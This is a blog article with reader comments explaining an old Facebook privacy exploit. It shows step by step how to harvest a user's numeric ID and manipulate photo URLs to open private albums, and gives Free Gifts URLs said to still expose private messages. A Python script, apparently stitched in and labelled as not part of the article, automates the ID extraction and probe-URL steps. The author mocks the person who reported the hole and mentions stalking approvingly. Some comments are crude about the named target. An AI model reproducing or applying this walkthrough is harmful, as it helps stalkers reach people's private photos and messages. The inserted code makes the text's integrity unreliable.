
The Tip of the Facebook Exploit Iceberg


Who's Byron Ng? A total tool, that's who. He's the one who ran a few Google searches and tipped off the Associated Press about a Facebook exploit that had been passing around the 'net for months. The AP picked up the story and put it in every newspaper under the sun, making him a minor campus celebrity who's now forever disinvited from Facebook Club. It also tipped off Facebook to what was going on, and the company was quick to plug the hole.

Thanks a lot, man.

But for all the press I've been seeing about this crazy hack that's destroying the privacy of millions--by letting everyone in the world peer into the secret debauchery of important Facebook users like Paris Hilton--I haven't seen a single news story that actually tells you what happened, or how one went about "exploiting" Facebook's security issues. For starters, the trick was a lot easier than you might think: it required very little effort on the "hacking" end of things and a decent amount of know-how on the "ingenuity" side of the equation.

The Setup

First, you had to find the ID number of your target. Facebook assigns each user an individual numeric ID and exposes it in its URLs, which was perhaps a mistake on the service's part, because that same number is accepted as a parameter in plenty of other URLs on the site. When you're viewing your own profile, it's the long string of digits after the "profile.php?id=" part of the URL. Same deal when you're viewing a friend's profile.

So how, then, do you acquire the ID number of a person who isn't your friend? If they haven't privacy-blocked your ability to see their profile, it's as easy as looking them up using a simple Facebook search and clicking through to the profile. Check the URL, and you'll find the ID number.

If your target has privacy-locked their page, the situation gets a little more complicated. In Paris Hilton's case, she's set things so that non-friends can do nothing but send her a message. But even that is enough to pull the ID number. Check out the URL Facebook generates for Ms. Hilton's "send message" link; her ID number is the id= value buried in the nested inbox URL at the end:

http://www.facebook.com/search_redirect.php?q=paris,hilton&fc=0&gc=3613&cl=300&rc=4073&rank=4&friends=0&sns=0&k=400000000010&t=1&u=http://www.facebook.com/inbox/?compose&id=1118869250&k=400000000010

See? As long as Facebook allows you to interact with a person in some capacity, you can pull their ID number. This even works for people who have blocked you on the service, as long as you've retained some artifact of earlier correspondence--say, a Facebook message (use Facebook's Report Message link to pull the ID from that one).

Keep this little trick in mind, because when the next Facebook exploit hits, it'll surely use the service's ID numbers as the basis for the hack. In fact, you can already use ID numbers on Facebook applications to see things you shouldn't--for example, any Free Gifts (and accompanying messages) a person has sent to or received from anyone else using the application, regardless of whether you're friends with (or blocked by) the original target. Use one of these URLs:

http://apps.facebook.com/freegifts/?to=[[ID NUMBER]]
http://apps.facebook.com/freegifts/?from=[[ID NUMBER]]

The Hammer

Once you had the Facebook ID number, the exploit itself was easy enough to navigate. Facebook used to build the URLs for photographs like this:

http://www.facebook.com/photo.php?pid=[[THE PICTURE'S ID]]
&op=1&view=all&subj=[[ID NUMBER OF SOMEONE TAGGED IN THE PHOTO]]
&id=[[ID NUMBER OF ALBUM'S OWNER]]

The bracketed portions are the parts that change depending on what you're looking at. The Picture ID is the number Facebook assigns, sequentially, to images uploaded to its service. The subj= ID number is, as the description suggests, the ID number of a person tagged in the particular photo. And the ID number of the album's owner, well... we'll just leave it at that.

Normally, when you click on a "see more pictures of X" link, the URL looks like this: the picture ID is that particular photo's number, subj= is X's ID, and id= is the ID of whoever owns the album. The Facebook exploit worked as follows: you'd start by entering a random nine-digit number for the picture ID. You'd use your target's ID number for the "someone tagged in the photo" part, and reuse that same ID for the album owner's part.

This little trick never got you results on the first shot, but that's OK; the point of the URL manipulation was to acquire a correct photo ID. Facebook would return an error message saying the page could not be found, but it would also autocorrect the pid= part of the URL to the photograph the target was most recently tagged in. From there, you'd take the corrected URL and delete the entire &id= portion, leaving &subj=####### as the end of the URL. Hit enter, and voila! Instant access to the last photograph the target was tagged in, and to the entire album in which that image resides, whether or not you're a friend of the person who created it.


An error? Hardly. Seeing this screen meant you were but one step away from private pictures galore!
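The ID-harvesting and URL manipulation described above, as an added example that is not part of the original article and never contacts Facebook: it parses the sample URLs printed on this page with Python's standard library, builds the photo.php probe URL, and strips the album-owner parameter the way the trick required. The percent-encoded variant of the "send message" link is constructed here for illustration (the article shows only the unencoded one), and the random seed and the pid 123456789 are arbitrary stand-ins, since the hole itself has long been closed.

```python
"""Added example (not code from the original article): the URL handling behind
the Facebook photo trick, done offline with the standard library only."""
import random
from typing import List, Optional
from urllib.parse import parse_qs, parse_qsl, quote, urlencode, urlsplit, urlunsplit

# The "send message" link quoted in the article: the target's ID sits in the
# inbox URL that is nested, unencoded, inside the u= parameter.
SEARCH_REDIRECT_URL = (
    "http://www.facebook.com/search_redirect.php?q=paris,hilton&fc=0&gc=3613"
    "&cl=300&rc=4073&rank=4&friends=0&sns=0&k=400000000010&t=1&u="
    "http://www.facebook.com/inbox/?compose&id=1118869250&k=400000000010"
)

# Constructed variant (an assumption, not from the article): the same link with
# the nested URL percent-encoded, so id= only appears one level down.
ENCODED_REDIRECT_URL = (
    "http://www.facebook.com/search_redirect.php?q=paris,hilton&u="
    + quote("http://www.facebook.com/inbox/?compose&id=1118869250&k=400000000010", safe="")
)

PHOTO_BASE = "http://www.facebook.com/photo.php"


def extract_id(url: str, param: str = "id") -> Optional[str]:
    """Return the first `param` value in url, descending into any u= parameter
    that itself carries a URL (as search_redirect.php does).

    If the nested URL was not encoded, its id= shows up in the outer query
    string directly; if it was, parse_qs unquotes it and we recurse."""
    params = parse_qs(urlsplit(url).query)
    if param in params:
        return params[param][0]
    for inner in params.get("u", []):
        found = extract_id(inner, param)
        if found:
            return found
    return None


def probe_url(target_id: str, pid: str) -> str:
    """Step one of the trick: photo.php with a guessed pid and the target's ID
    in both subj= (tagged person) and id= (album owner)."""
    query = urlencode([("pid", pid), ("op", "1"), ("view", "all"),
                       ("subj", target_id), ("id", target_id)])
    return f"{PHOTO_BASE}?{query}"


def probe_urls(target_id: str, count: int, seed: Optional[int] = None) -> List[str]:
    """A batch of probe URLs with random nine-digit pids, as the article
    describes; the seed only makes the batch reproducible."""
    rng = random.Random(seed)
    return [probe_url(target_id, str(rng.randint(100_000_000, 999_999_999)))
            for _ in range(count)]


def strip_owner_id(corrected_url: str) -> str:
    """Step two: once the error page has 'autocorrected' pid= to a real photo,
    drop the &id= (album owner) parameter and keep everything else, so the URL
    ends in ...&subj=<target>."""
    parts = urlsplit(corrected_url)
    kept = [(k, v) for k, v in parse_qsl(parts.query) if k != "id"]
    return urlunsplit(parts._replace(query=urlencode(kept)))


if __name__ == "__main__":
    target = extract_id(SEARCH_REDIRECT_URL)
    print("target id:", target)
    for url in probe_urls(target, 3, seed=1):
        print("probe:", url)
    # Stand in for the URL Facebook handed back with pid= corrected.
    corrected = probe_url(target, "123456789")
    print("album:", strip_owner_id(corrected))
```

The general lesson, independent of Facebook: a parameter that carries another URL (here u=) can smuggle identifiers past a casual reading of the link, and any endpoint that takes an object ID straight from the query string without checking who is asking is a candidate for exactly this kind of walk-through.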

A similar trick worked to access the last photo the target tagged of him/herself. These tricks didn't exactly break the dam of Facebook privacy, but they did give industrious users--and stalkers--a means to check up on what anyone's doing at any time, dependent only on one's tenacity and zest for URL refreshing. But thanks to Byron, who clearly felt the need to let the world know that he and he alone found this industrious exploit, we will no longer be able to catch up on what our favorite internet celebrities are up to. Sigh.

You, sir, owe the Web 2.0 an apology.

Hey!

We've done some more research and found a few more Facebook exploits! Hi to all the Digg users who are keeping up with this!

COMMENTS

Facebook ID

Hi, is there a way to find the name and photo of a facebook user, given only their ID number?  Not to gain access to their account, but to provide a profile image and name?  thanks

How was the hole fixed?

Now I don't know very much about hacking, but out of curiosity, how exactly did facebook fix this hole? What has changed since Ng sold out the secret? I'd say the best way to get past facebook's security is to know how it works. Also, is it possible to trick the system to believe that you are a friend and allow you to view the profile?

hah, finally some byron ng hate.

Good article. Byron Ng is a tool. I've had these exploits on my site for almost 2 months now. I just love how he claimed he discovered them.
If it weren't for him we'd still be using them...
Byron Ng even called the press last year claiming to have a pre-release of that harry potter book.. guess what.. so did hundreds of thousands of other people who know what a torrent is. I think he just craves attention.

I'm curious to see what

I'm curious to see what paris hilton's private pictures are...

I've already seen her

I've already seen her privates, why exploit to see them again?

Exactly, enough of the ugly

Exactly, enough of the ugly stick already